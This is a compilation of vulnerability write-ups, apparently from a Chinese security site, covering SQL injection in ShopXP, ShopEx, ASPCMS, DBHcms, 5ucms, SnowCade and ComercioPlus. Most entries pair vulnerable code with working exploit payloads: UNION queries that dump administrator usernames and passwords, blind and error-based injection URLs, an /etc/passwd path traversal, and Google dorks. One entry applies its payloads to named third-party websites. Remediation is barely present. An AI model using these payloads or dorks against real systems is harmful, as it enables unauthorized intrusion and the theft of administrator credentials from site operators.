Below, the editor has compiled "shopxp pinglun.asp file SQL injection vulnerability analysis (vulnerability alert)" (10 articles in total) for you; we hope you like them. We also hope that, like this article's contributor "睡不醒的冰西瓜", you will actively submit good articles to this site.
Vulnerability author: zpino
The vulnerability is in the file /admin/pinglun.asp
<%=webname%>--User Comments
<%dim shopxpptid,action
pinglunid=request.QueryString("id")
action=request.QueryString("action")
if action="save" then
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shopxp_pinglun where pinglunid="&pinglunid,conn,1,3
rs("huifu")=HTMLEncode2(trim(request("huifu")))
rs("huifudate")=now
rs.update
rs.close
set rs=nothing
………… /* omitted */ …………
<%set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shopxp_pinglun where pinglunid="&pinglunid,conn,1,3
%>
First, look at the connection file:
<%
dim conn,connstr,db
startime=timer()
db="../shopxp/"&dataname&"" 'database
on error resume next 'keep trying to connect to the database until it times out; SQL injection filtering could be strengthened here
connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
'connstr="DBQ="+server.mappath(""&db&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>
This file's job is to obtain the database connection object. Back in /admin/pinglun.asp:
pinglunid=request.QueryString("id")
action=request.QueryString("action")
The value of id is assigned to pinglunid. Following pinglunid, we reach:
<%set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shopxp_pinglun where pinglunid="&pinglunid,conn,1,3
%>
As you can see, the value is passed to the database without any filtering, and the query result is then printed out further down, which produces a SQL injection vulnerability.
Another SQL injection
Tested version: shopex-singel-4.8.5.78660
File: \core\shop\controller\ctl.tools.php
function products(){
    $objGoods = &$this->system->loadModel('goods/products');
    $filter = array();
    foreach(explode(',',$_POST['goods']) as $gid){
        $filter['goods_id'][] = $gid;
    }
    $this->pagedata['products'] = $objGoods->getList($objGoods->defaultCols.',find_in_set(goods_id,"'.$_POST['goods'].'") as rank',$filter,0,-1,array('rank','asc'));
}
Clearly $_POST['goods'] goes straight into the SQL statement. Because some of the files are encrypted, the MySQL statement log was switched on to confirm it.
Submit:
goods=aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators%23

130526 20:03:23 352 Connect root@localhost on
352 Init DB shopex
352 Query SET NAMES 'utf8'
352 Query SELECT * FROM sdb_plugins WHERE plugin_type="app"
352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1
352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1
352 Query SELECT count(goods_id) FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc
352 Query SELECT bn,name,cat_id,price,store,marketable,brand_id,weight,d_order,uptime,type_id,supplier_id,find_in_set(goods_id,"aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators#") as rank,goods_id,image_default,thumbnail_pic,brief,pdt_desc,mktprice,big_pic FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc LIMIT 0, 18446744073709551615
Looking at the log, the variable has entered the SQL statement.
Another SQL injection vulnerability. Tested version: shopex-singel-4.8.5.78660
File: \core\shop\controller\ctl.member.php
function delTrackMsg(){
    if(!empty($_POST['deltrack'])){
        $oMsg = &$this->system->loadModel('resources/msgbox');
        $oMsg->delTrackMsg($_POST['deltrack']);
        $this->splash('success', $this->system->mkUrl("member","track"), __('删除成功'));
    }else{
        $this->splash('failed', $this->system->mkUrl("member","track"), __('删除失败: 没有选中任何记录!'));
    }
}
Follow $oMsg->delTrackMsg($_POST['deltrack']);
In file: \core\model_v5\resources\mdl.msgbox.php
public function delTrackMsg( $aMsgId ) {
    $aTmp = array();
    foreach ( $aMsgId as $val ) {
        if ( $val ) { $aTmp[] = $val; }
    }
    if ( $aTmp ) {
        $this->db->exec( "DELETE FROM sdb_message WHERE msg_id IN (".implode( ",", $aTmp ).") AND del_status='1'" );
        $this->db->exec( "UPDATE sdb_message SET del_status='2' WHERE msg_id IN (".implode( ",", $aTmp ).")" );
    }
    return true;
}
SQL injection that surfaces in a DELETE statement is pure grunt work: whether or not a message gets deleted is the only oracle, so the data has to be extracted slowly.
Submitted packet: deltrack[1]=1) and (select count(*) from sdb_operators)=1%23
Check the SQL execution log:
130526 20:31:25 360 Connect root@localhost on
360 Init DB shopex
360 Query SET NAMES 'utf8'
360 Query SELECT * FROM sdb_plugins WHERE plugin_type="app"
360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1
360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1
360 Query select member_id,member_lv_id,email,uname,b_year,b_month,b_day,password,unreadmsg,cur,lang,point,experience from sdb_members where member_id=4 LIMIT 0, 1
360 Query SELECT count(*) AS unreadmsg FROM sdb_message WHERE to_type = 0 AND del_status != '1' AND folder = 'inbox' AND unread = '0' AND to_id =4 LIMIT 0, 1
360 Query SELECT plugin_name,plugin_ident FROM sdb_plugins WHERE 1 AND sdb_plugins.disabled = 'false' AND sdb_plugins.plugin_type='app' LIMIT 0, 20
360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='commodity_radar' LIMIT 0, 1
360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='shopex_stat' LIMIT 0, 1
360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='pay_offline' LIMIT 0, 1
360 Query DELETE FROM sdb_message WHERE msg_id IN (1) and (select count(*) from sdb_operators)=1#) AND del_status='1'
Executed successfully.
Proof:
Because (select count(*) from sdb_operators)=1 is true, the record with msg_id=1 was deleted.
Guess it out slowly, one condition at a time...
Author: code_sec
ASPCMS does not strictly filter user-submitted parameters, so an attacker can submit SQL statements that query the database and obtain sensitive information.
The vulnerability is in /admin_aspcms/_content/_Content/AspCms_ContentFun.asp. This file does not verify administrator privileges, so anyone can reach it, and it does not pass the parameters it reads through the custom filterPara function, which leads to injection at several points. The code is as follows:
<% ''die debugmode
dim action : action=getForm("action","get")
dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Content, ContentStatus, IsTop, IsRecommend, IsImageNews, IsHeadline, IsFeatured, ContentOrder, IsGenerated, Visits, AddTime, ImagePath, IndexImage, DownURL, PageTitle, PageKeywords, PageDesc, PageFileName, spec, EditTime,DownGroupID,IsNoComment,Star,Timeing,TimeStatus,VideoGroupID,CHvalue,SpecCategory
''SpecCategory identifies which type of custom parameter is being handled
dim sortType, keyword, page, psize, order, ordsc, sortTypeName
sortType=getForm("sortType","get")
if isnul(sortType) then sortType=0
sortid=getForm("sortid","post")
if isnul(sortid) then sortid=getForm("sortid","get")
keyword=getForm("keyword","post")
if isnul(keyword) then keyword=getForm("keyword","get")
page=getForm("page","get")
psize=getForm("psize","get")
order=getForm("order","get")
ordsc=getForm("ordsc","get")
DownGroupID=getForm("DownGroupID","post")
VideoGroupID=getForm("VideoGroupID","post")
select case sortType
case "2"
sortTypeName ="文章"
SpecCategory = "C"
case "3"
sortTypeName ="产品"
SpecCategory = "P"
case "4"
sortTypeName ="下载"
SpecCategory = "DL"
case "5"
sortTypeName ="招聘"
SpecCategory = "HR"
case "6"
sortTypeName ="相册"
SpecCategory = "FO"
case "8"
sortTypeName = "视频"
SpecCategory = "VI"
end select
''single page 1, article 2, product 3, download 4, recruitment 5, album 6, link 7, video 8
Select case action
case "add" : addContent
case "edit" : editContent
case "move" : moveContent
case "copy" : copyContent
case "rpost" : rpostContent
case "del" : delContent
case "recovery" : Recovery
case "tdel" : trueDelContent
case "on" : onOff "on", "Content", "ContentID", "ContentStatus", "", getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
case "off" : onOff "off", "Content", "ContentID", "ContentStatus", "", getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
case "order" : UpdateOrder
End Select
Sub trueDelContent
dim id : id=getForm("id","both")
if isnul(id) then alertMsgAndGo "请选择要操作的内容","-1"
if runmode=1 then
dim rs, sql, filepath
dim templateobj : set templateobj=new TemplateClass
sql="select ContentID,Title,sortType,SortFolder,a.GroupID,ContentFolder,ContentFileName,a.AddTime,a.PageFileName,a.SortID,b.GroupID from {prefix}Content as a, {prefix}Sort as b where a.LanguageID="&session("languageID")&" and a.SortID=b.SortID and ContentStatus=2 and ContentID in("&id&")"
set rs=conn.exec(sql,"r1")
do while not rs.eof
filepath=templateobj.getContentLink(rs("SortID"),rs("ContentID"),rs("SortFolder"),rs("a.GroupID"),rs("ContentFolder"), _
rs("ContentFileName"),rs("AddTime"),rs("PageFileName"),rs("b.GroupID"))
if isExistFile(filepath) then delFile filepath
''echo filepath&""
rs.movenext
loop
end if
conn.exec "delete from {prefix}Content where ContentStatus=2 and ContentID in("&id&")","exe"
alertMsgAndGo "彻底删除成功",getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
End Sub
Exploitation is fairly simple: the id parameter goes into the IN(...) clause unfiltered, and iif is used to force an error on a false condition:
www.xxx.com/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=97),2,chr(97))
Checks whether the first character of the administrator's username is "a".
www.xxx.com/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=98),2,chr(97))
Checks whether the first character of the administrator's username is "b".
When the condition is false, an error is forced.
Google it:
intext:powered by Thaiweb
inurl:index.php?page=board.php
Exploit point 1: www.xfack.com/index.php?page=../../../../../../../../../../../../../etc/passwd
Exploit point 2: www.xfack.com/index.php?page=boardque.php&bod_id=4'
www.keytasin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
www.autopartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
gift.in.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
ShopEx 4.85 (latest version) SQL injection: no login required, bypasses GPC, and directly queries and echoes the administrator password.
Nothing more to say; straight to the exploit code. Save the HTML below as an .html file and change the localhost part to the site's real address:
columns:
DBHcms 1.1.4 SQL injection vulnerability alert
DBHcms is an open-source content management system aimed at personal and small-business websites; it is developed in several language versions and has good support for search-engine optimisation. The main cause of the vulnerability is that submitted parameters are not strictly filtered, which produces a SQL injection vulnerability.
SQL injection test code:
192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--
5ucms latest version SQL injection vulnerability alert
Vulnerable file: /mobile/index.asp
Description: the id variable is not filtered, which produces a SQL injection.
Tested on: www.5u.hk/ (official site)
Proof ↓
EXP ↓
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin
Fix ↓
Filter the input.
I have had this for a long time without using it much, so I am releasing it. I hope it is used only for testing and not abused.
SnowCade v3 has SQL injection vulnerabilities at multiple points, which can yield administrator privileges.
127.0.0.1/index.php?action=browse&cat=[injection statement]
127.0.0.1/index.php?action=playgame&gameid=[injection statement]
For example: 127.0.0.1/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--
Note: author ahwak
ComercioPlus is a virtual store system written in PHP. The pp_productos.php file in ComercioPlus 5.6 has a SQL injection vulnerability that may lead to disclosure of sensitive information.
[+]info:
~~~~~~~~~
# Exploit Title: Comerciosonline CMS SQLi
# Google Dork: allintext: " Servicio ofrecido por ComerciosOnLine "
# Date: 27/01/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: www.comerciosonline.com/index.php?p=8
# Version: All
# Tested on: Linux, Windows
[+]poc:
~~~~~~~~~
localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/16060